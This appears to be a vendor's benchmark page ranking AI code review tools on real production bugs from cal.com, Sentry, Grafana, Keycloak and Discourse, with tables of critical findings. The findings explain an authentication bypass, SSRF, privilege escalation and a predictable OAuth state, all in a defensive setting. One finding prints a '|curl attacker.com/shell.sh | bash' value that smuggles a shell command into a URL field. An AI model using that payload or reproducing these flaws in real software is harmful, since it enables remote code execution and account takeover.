How well do AI code reviewers catch real bugs?
In this independent 2026 benchmark of 6 leading AI code review tools, Tenki catches 84 of 122 real production bugs across 50 pull requests from cal.com, Sentry, Grafana, Keycloak, and Discourse, graded per finding by a 3-judge LLM panel. That's 1.9× the next-best reviewer.
How we benchmarked AI code reviewers
Every pull request contains a real, merged bug-fix from an open-source codebase. We replay the bug-introducing diff into a clean fork and let each tool review it with its default configuration. Reviews are then graded by a 3-LLM judge panel using majority vote. No synthetic bugs, no repo-specific tuning.
50 bug-fix PRs from 5 open-source repositories
Real merged fixes from cal.com (TypeScript), sentry (Python), grafana (Go), keycloak (Java), and discourse (Ruby). Five major server-side languages are represented in the bug set.
Real bugs reintroduced, not invented
The bug-introducing (pre-fix) diff is replayed against every tool with default settings: no custom rules, no repo-specific tuning, and full repository context for every reviewer. Every tool sees the same code at the same point in history.
Per-finding 3-judge LLM majority vote
Each individual bug is scored separately. A finding is counted as caught only when a line-level comment explicitly identifies the faulty code and explains the impact, and the majority of three independent LLM judges agrees. Per-PR scoring is avoided because it over-credits drive-by comments.
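The majority-vote rule described above can be sketched in a few lines. This is a minimal illustration, not the benchmark's actual grading code: the function names and the example votes are hypothetical, and each vote is assumed to already encode whether a judge found a line-level comment that identifies the faulty code and explains the impact.

```python
from typing import Dict, Sequence


def majority_caught(votes: Sequence[bool]) -> bool:
    """Return True when at least two of the three judges say the bug was caught."""
    if len(votes) != 3:
        raise ValueError("expected exactly three judge votes")
    return sum(votes) >= 2


def score_findings(votes_by_finding: Dict[str, Sequence[bool]]) -> Dict[str, bool]:
    """Score every finding independently (per finding, not per pull request)."""
    return {finding_id: majority_caught(votes)
            for finding_id, votes in votes_by_finding.items()}


# Hypothetical votes for two findings from one tool's review.
example_votes = {
    "001": (True, True, False),   # two of three judges agree: caught
    "002": (False, True, False),  # only one judge agrees: not caught
}
verdicts = score_findings(example_votes)
```

Scoring each finding on its own means a pull request with three bugs contributes three separate verdicts, so a single vague comment cannot earn credit for all of them.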
Leaderboard: recall, precision, and F1 across every real bug
Each individual bug is scored, not each pull request. Recall is the share of real bugs caught. Precision is the share of a tool's comments that flag a real bug. F1 is the harmonic mean of recall and precision and drives the ranking.
Higher-precision tools post fewer comments overall. Tenki's higher comment volume drives both higher recall and lower precision; see methodology for how each metric is computed.
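As a rough sketch of how the three metrics relate, the function below computes them from four counts. The parameter names and the toy numbers are illustrative assumptions; the benchmark's own per-tool comment counts are not given in this section.

```python
def review_metrics(bugs_caught: int, total_bugs: int,
                   matching_comments: int, total_comments: int) -> dict:
    """Compute recall, precision, and F1 for one reviewer.

    recall    = real bugs caught / all real bugs
    precision = comments that flag a real bug / all comments posted
    F1        = harmonic mean of recall and precision
    """
    recall = bugs_caught / total_bugs if total_bugs else 0.0
    precision = matching_comments / total_comments if total_comments else 0.0
    denominator = recall + precision
    f1 = 2 * recall * precision / denominator if denominator else 0.0
    return {"recall": recall, "precision": precision, "f1": f1}


# Toy numbers (hypothetical): 3 of 4 bugs caught, 3 of 6 comments flag a real bug.
toy = review_metrics(bugs_caught=3, total_bugs=4,
                     matching_comments=3, total_comments=6)
```

With these toy counts, posting more comments raises the chance of catching each bug but dilutes precision, which is the trade-off the note above describes.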
Coding agents are bundled into the IDE and review their own work in-loop, not post-hoc on a PR diff. Shown here for context, not as an apples-to-apples comparison.
Tenki vs Devin: the closest AI code reviewer
Devin is the runner-up by F1 score in this benchmark. Tenki's lead is widest at the finding level, where recall (the share of real bugs caught) matters most for engineering teams who need coverage they can trust.
Do AI code reviewers catch the bugs that actually matter?
Catch rate broken down by the severity of the individual finding. Critical bugs cause outages, data loss, or auth bypass. High-severity bugs break major user-facing flows. Medium bugs degrade behavior without breaking it. The first column, Critical, is the severity that matters most for production reliability.
Performance per codebase: cal.com, Sentry, Grafana, Keycloak, Discourse
Per-repository recall: the share of real bugs each AI code reviewer caught in each codebase. The Tenki Δ column is the gap, in percentage points, between Tenki and the best other reviewer for that repo; a negative value means another reviewer caught more bugs than Tenki.
| Repository | Tenki | CodeRabbit | Copilot | Cursor | Devin | Graphite | Greptile | Tenki Δ |
|---|---|---|---|---|---|---|---|---|
| cal.com (33 bugs) | 91% (30/33) | 21% (7/33) | 21% (7/33) | 30% (10/33) | 33% (11/33) | 0% (0/33) | 30% (10/33) | +57.6pp |
| sentry (31 bugs) | 55% (17/31) | 16% (5/31) | 6% (2/31) | 13% (4/31) | 29% (9/31) | 0% (0/31) | 13% (4/31) | +25.8pp |
| discourse (22 bugs) | 73% (16/22) | 36% (8/22) | 32% (7/22) | 32% (7/22) | 27% (6/22) | 5% (1/22) | 50% (11/22) | +22.7pp |
| keycloak (15 bugs) | 67% (10/15) | 40% (6/15) | 47% (7/15) | 47% (7/15) | 27% (4/15) | 0% (0/15) | 53% (8/15) | +13.3pp |
| grafana (21 bugs) | 52% (11/21) | 43% (9/21) | 33% (7/21) | 52% (11/21) | 67% (14/21) | 14% (3/21) | 52% (11/21) | -14.3pp |
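The Tenki Δ column can be reproduced from the caught counts in the table. The sketch below copies those counts and computes the gap to the best other reviewer in percentage points; the variable and function names are illustrative.

```python
# Caught counts per repository, copied from the table above:
# repo -> (total bugs, {reviewer: bugs caught})
RESULTS = {
    "cal.com": (33, {"Tenki": 30, "CodeRabbit": 7, "Copilot": 7, "Cursor": 10,
                     "Devin": 11, "Graphite": 0, "Greptile": 10}),
    "sentry": (31, {"Tenki": 17, "CodeRabbit": 5, "Copilot": 2, "Cursor": 4,
                    "Devin": 9, "Graphite": 0, "Greptile": 4}),
    "discourse": (22, {"Tenki": 16, "CodeRabbit": 8, "Copilot": 7, "Cursor": 7,
                       "Devin": 6, "Graphite": 1, "Greptile": 11}),
    "keycloak": (15, {"Tenki": 10, "CodeRabbit": 6, "Copilot": 7, "Cursor": 7,
                      "Devin": 4, "Graphite": 0, "Greptile": 8}),
    "grafana": (21, {"Tenki": 11, "CodeRabbit": 9, "Copilot": 7, "Cursor": 11,
                     "Devin": 14, "Graphite": 3, "Greptile": 11}),
}


def tenki_delta_pp(total: int, caught: dict) -> float:
    """Gap in percentage points between Tenki and the best other reviewer."""
    best_other = max(n for name, n in caught.items() if name != "Tenki")
    return round(100 * (caught["Tenki"] - best_other) / total, 1)


deltas = {repo: tenki_delta_pp(total, caught)
          for repo, (total, caught) in RESULTS.items()}

# Overall totals across the five repositories.
tenki_total = sum(caught["Tenki"] for _, caught in RESULTS.values())
bug_total = sum(total for total, _ in RESULTS.values())
```

The per-repo totals sum to the headline figure of 84 of 122 bugs, and the grafana delta is negative because Devin caught 14 of 21 there against Tenki's 11.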
Every real bug, every reviewer verdict
One row per real bug: 122 distinct findings across 50 production pull requests. Each cell shows whether that AI code reviewer flagged that specific finding, as decided by a 3-LLM majority vote. The rows shown here are Critical-severity findings.
| # | Repo · PR | Finding | Severity | Tenki | CodeRabbit | Copilot | Cursor | Devin | Graphite | Greptile |
|---|---|---|---|---|---|---|---|---|---|---|
| 001 | cal.com · #3 | Backup-code login bypasses password verification. In `packages/features/auth/lib/next-auth-options.ts`, `authorize()`:
if (user.password && !credentials.totpCode) {
// verify password via verifyPassword(credentials.password, user.password)
}
if (user.twoFactorEnabled && credentials.backupCode) {
// accept backup code as 2FA factor
} else if (user.twoFactorEnabled) {
// verify totpCode
}
Submitting `credentials.totpCode = <anything truthy>` (it does not need to be valid because the new branch only consumes backupCode) makes `!credentials.totpCode` false and skips the password block entirely. The backup-code branch then accepts the credential and the user is logged in. Effect: an attacker who has any single backup code can sign in without the account password — backup codes become permanent password replacements rather than recovery factors. The fix is to verify the password unconditionally when user.password is set (regardless of totpCode/backupCode presence) and only use backupCode in place of totpCode, not in place of password. | Critical | ✕ | ✕ | ✕ | ✕ | ✓ | ✕ | ✕ |
| 002 | cal.com · #8 | **🚨 Missing `prisma` import in SalesforceCalendarService causes runtime crash** (bug)
In `packages/app-store/salesforce/lib/CalendarService.ts`, `prisma.credential.update` is called on line 96 to persist refreshed tokens, but `prisma` is never imported. There is no `import prisma from "@calcom/prisma"` in the file. This will throw a `ReferenceError: prisma is not defined` at runtime whenever Salesforce credentials need a token refresh.
**💡 Suggestion**: Add `import prisma from "@calcom/prisma";` to the import block at the top of the file.
<details>
<summary>📋 Prompt for AI Agents</summary>
In packages/app-store/salesforce/lib/CalendarService.ts, add a missing import for prisma. After the existing import block (around line 20), add: `import prisma from "@calcom/prisma";`. This is required because `prisma.credential.update` is called on line 96 to persist refreshed tokens, but the module is never imported, causing a ReferenceError at runtime.
</details> | Critical | ✓ | ✕ | ✕ | ✕ | ✕ | ✕ | ✓ |
| 003 | discourse · #4 | best.html.erb closes if/else with `<%- end if %>`: invalid Ruby, view crashes. app/views/embed/best.html.erb (added in this PR) opens an if/else at lines 2-6:
<%- if @topic_view.posts.present? %>
...
<%- else %>
...
<%- end if %>
The `end if` form is Ruby's trailing-if statement modifier and requires an expression after `if` (e.g. `end if some_cond`). With no expression the template compiles to invalid Ruby and rendering raises SyntaxError. The embed view is the entry point for the new embeddable-comments feature, so any host page that embeds Discourse comments will fail to render the iframe. Fix: change to `<%- end %>`. | Critical | ✕ | ✕ | ✕ | ✕ | ✓ | ✕ | ✓ |
| 004 | discourse · #4 | **🚨 SSRF via user-controlled embed_url triggers open() to arbitrary URL** (security)
In `EmbedController#best` (line 9), the `embed_url` parameter comes directly from user-supplied query parameters. When no existing topic embed is found, this value is passed verbatim to `Jobs.enqueue(:retrieve_topic, embed_url: embed_url)`. Inside `Jobs::RetrieveTopic#execute`, it is passed to `TopicRetriever.new(@embed_url)`, which calls `TopicEmbed.import_remote(user, @embed_url)`, which calls `open(url).read` (Ruby's `Kernel#open` / `open-uri`). Although `TopicRetriever#invalid_host?` checks that the URL's host matches `SiteSetting.embeddable_host`, this check only runs for pre-validated embeds after the job is enqueued — the URL is already accepted by the controller before any host validation occurs (the controller only checks the HTTP Referer header, not the embed_url itself). More critically, `Kernel#open` also accepts pipe-prefixed strings (`|command`) on older Ruby/open-uri combinations that allow OS command execution. Even if host validation were reliable, a URL with a valid host prefix but path traversal (e.g. query string exploits) can reach internal services.
**💡 Suggestion**: Validate `embed_url` against the configured `embeddable_host` in the controller before enqueuing the job, not just in the retriever. Use `URI.parse` and compare the host explicitly, and reject any URL whose scheme is not `http` or `https`. Additionally, replace `open(url)` in `import_remote` with `Net::HTTP` or a whitelisted HTTP client that cannot be used for file/pipe access.
<details>
<summary>📋 Prompt for AI Agents</summary>
In app/controllers/embed_controller.rb, before calling Jobs.enqueue at line 15, add host validation of embed_url: parse it with URI.parse, verify the scheme is http/https and the host matches SiteSetting.embeddable_host, and raise Discourse::InvalidAccess if either check fails. In app/models/topic_embed.rb at line 48, replace `open(url).read` with an explicit HTTP fetch using Net::HTTP or Faraday so that file:// and pipe-exec URIs are never processed.
</details> | Critical | ✓ | ✓ | ✓ | ✕ | ✕ | ✕ | ✓ |
| 005 | discourse · #4 | **🚨 SSRF and RCE via Kernel#open with attacker-controlled URL from Disqus XML** (security)
The PR replaces `PostCreator` with `TopicEmbed.import_remote(user, t[:link], ...)` at line 148. The value `t[:link]` is read directly from the `<link>` element of the Disqus XML export file (parsed at `disqus.thor:58`). Inside `TopicEmbed.import_remote` (topic_embed.rb:48), Ruby's `Kernel#open(url)` is called with this attacker-controlled value **before** any URL validation.
Ruby's `Kernel#open` has two critical behaviours beyond HTTP:
1. **Remote Code Execution**: if the URL begins with `|`, it is interpreted as a shell command. A Disqus XML containing `<link>|curl attacker.com/shell.sh | bash</link>` would execute arbitrary shell commands on the import host.
2. **SSRF / local file read**: URLs with `file://` scheme or internal addresses (e.g., `http://169.254.169.254/`) allow reading arbitrary local files or probing internal services.
The `https?://` guard in `TopicEmbed.import` (line 11) does NOT protect against this because `open(url)` in `import_remote` is called at line 48 **before** `import` is invoked at line 52. The `TopicRetriever` code path validates the host against `SiteSetting.embeddable_host`, but the Disqus importer bypasses that validation entirely.
**💡 Suggestion**: Replace `Kernel#open(url)` with an explicit HTTP client call (e.g., `Net::HTTP.get(URI(url))` or `open-uri` with explicit `URI.open`) and validate the URL scheme before fetching. Add a guard at the start of `import_remote` that rejects non-http(s) URLs (matching the guard already present in `import`). Additionally, validate `t[:link]` in `disqus.thor` before passing it to `import_remote`.
```suggestion
doc = Readability::Document.new(URI.open(url).read,
```
<details>
<summary>📋 Prompt for AI Agents</summary>
In app/models/topic_embed.rb, the `import_remote` method at line 44 uses Ruby's `Kernel#open(url)` at line 48 to fetch a URL that can originate from an attacker-controlled Disqus XML file (via lib/tasks/disqus.thor line 148). Ruby's Kernel#open executes shell commands when the string starts with '|', enabling RCE. Fix this by: (1) adding a URL scheme check at the top of `import_remote` identical to the one in `import` (line 11): `return unless url =~ /^https?:\/\//`; (2) replacing `open(url)` with `URI.open(url)` (from OpenURI) or an explicit Net::HTTP call to avoid the shell-dispatch behaviour of Kernel#open. Also add `require 'open-uri'` if not already present.
</details> | Critical | ✓ | ✓ | ✓ | ✕ | ✕ | ✕ | ✓ |
| 006 | keycloak · #6 | GroupPermissionsV2.canManage() accepts VIEW scope: privilege escalation. In services/src/main/java/org/keycloak/services/resources/admin/permissions/GroupPermissionsV2.java, around line 70:
public boolean canManage() {
if (root.hasOneAdminRole(AdminRoles.MANAGE_USERS)) return true;
return hasPermission(null, AdminPermissionsSchema.VIEW, AdminPermissionsSchema.MANAGE);
}
The corresponding per-group `canManage(GroupModel group)` later in the same file (~line 78) correctly does `hasPermission(group.getId(), MANAGE)`. The no-arg variant must mirror that — a manage operation must require a manage scope. Accepting VIEW here means: a user granted ONLY the all-groups VIEW permission satisfies the canManage() check and can then call admin endpoints that gate on requireManage()/canManage() (GroupsResource.addTopLevelGroup, GroupResource cross-group moves, etc.). The fix is `hasPermission(null, AdminPermissionsSchema.MANAGE)`. | Critical | ✓ | ✓ | ✓ | ✓ | ✕ | ✕ | ✓ |
| 007 | sentry · #4 | OAuth state parameter is a deterministic pipeline.signature, not a per-session nonce. src/sentry/integrations/github/integration.py introduces OAuthLoginView with `state = pipeline.signature` and validates the callback via `request.GET.get('state') != pipeline.signature`. Per src/sentry/pipeline/base.py:133, pipeline.signature is computed as `md5_text(*[f'{module}.{cls}' for v in self.pipeline_views]).hexdigest()`, a deterministic hash of the pipeline view class names. The value is identical for every Sentry installation that uses the same GitHub provider pipeline, so an attacker who knows the (open-source) pipeline composition can predict the state value, craft a callback URL with a stolen authorization code, and bind an attacker-controlled GitHub installation to the victim's session. The fix is to generate a per-session cryptographic nonce (e.g. secrets.token_urlsafe), store it in pipeline state, and compare against that. Recommended additions: PKCE, exact-match redirect URI validation, and rate-limiting the callback. | Critical | ✕ | ✕ | ✕ | ✕ | ✕ | ✕ | ✕ |
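The fix suggested for finding 007 (a per-session nonce instead of a deterministic signature) might look roughly like the sketch below. It is not Sentry's code: the plain `session` dict stands in for the pipeline state, and `issue_state`, `verify_state`, and the `oauth_state` key are hypothetical names. Only `secrets.token_urlsafe` and `hmac.compare_digest` are real standard-library calls.

```python
import hmac
import secrets
from typing import Optional


def issue_state(session: dict) -> str:
    """Generate an unpredictable per-session state value and remember it."""
    state = secrets.token_urlsafe(32)
    session["oauth_state"] = state  # hypothetical key; stands in for pipeline state
    return state


def verify_state(session: dict, returned_state: Optional[str]) -> bool:
    """Check the callback's state against the stored nonce, single use."""
    expected = session.pop("oauth_state", None)  # consume it so it cannot be replayed
    if not expected or not returned_state:
        return False
    # Constant-time comparison on bytes avoids timing leaks and non-ASCII errors.
    return hmac.compare_digest(expected.encode(), returned_state.encode())


# Usage: one session issues a state, the callback must echo exactly that value.
session = {}
state = issue_state(session)
ok_first = verify_state(session, state)
ok_replay = verify_state(session, state)
```

Because the nonce is random per session and removed on first use, knowing the pipeline's view class names no longer helps an attacker predict or replay the state value.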